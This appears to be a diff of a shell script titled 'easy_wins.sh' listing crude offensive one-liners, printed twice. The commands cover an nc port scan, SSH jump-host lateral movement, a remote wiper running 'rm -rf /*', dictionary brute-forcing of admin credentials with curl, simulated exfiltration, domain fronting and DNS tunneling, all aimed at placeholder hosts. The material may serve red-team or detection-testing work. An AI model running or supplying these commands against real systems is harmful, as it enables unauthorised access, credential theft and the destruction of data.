magisterquis · October 26, 2018 19:31
diff --git a/easy_wins.sh b/easy_wins.sh
 #Port Scanning
 for p in `jot 65535`; do
      nc -vz TARGET $p
 done 2>&1 | tee portscan.out

 #Lateral Movement
 ssh -J REDIR1,REDIR2,REDIR3,REDIR4 user@TARGET

 #Wiper
 ssh TARGET rm -rf /*

 #Creds brute-forcing
 for p in `cat /usr/share/dict/words`; do
      curl -svLu "admin:$p" http://TARGET
 done

 #Exfil
 ssh SERVER 'cat >/dev/null' </dev/urandom

 #Domain Fronting
 curl -svL -H 'Host: BADDOMAIN' https://BENIGNDOMAIN

 #DNS Tunneling
 for i in `cat /etc/services`; do
      dig $i.DOMAIN;
 done

 #DNS over HTTPS (DoH)
 curl -svL 'https://dns.google.com/resolve?type=A&name=NAME'

 #DNS over domain-fronted HTTPS
 curl -svL -H 'Host: dns.google.com https://youtube.com?type=A&name=NAME'
	#Port Scanning
	for p in `jot 65535`; do
	nc -vz TARGET $p
	done 2>&1 \| tee portscan.out

	#Lateral Movement
	ssh -J REDIR1,REDIR2,REDIR3,REDIR4 user@TARGET

	#Wiper
	ssh TARGET rm -rf /*

	#Creds brute-forcing
	for p in `cat /usr/share/dict/words`; do
	curl -svLu "admin:$p" http://TARGET
	done

	#Exfil
	ssh SERVER 'cat >/dev/null' </dev/urandom

	#Domain Fronting
	curl -svL -H 'Host: BADDOMAIN' https://BENIGNDOMAIN

	#DNS Tunneling
	for i in `cat /etc/services`; do
	dig $i.DOMAIN;
	done

	#DNS over HTTPS (DoH)
	curl -svL 'https://dns.google.com/resolve?type=A&name=NAME'

	#DNS over domain-fronted HTTPS
	curl -svL -H 'Host: dns.google.com https://youtube.com?type=A&name=NAME'
No results found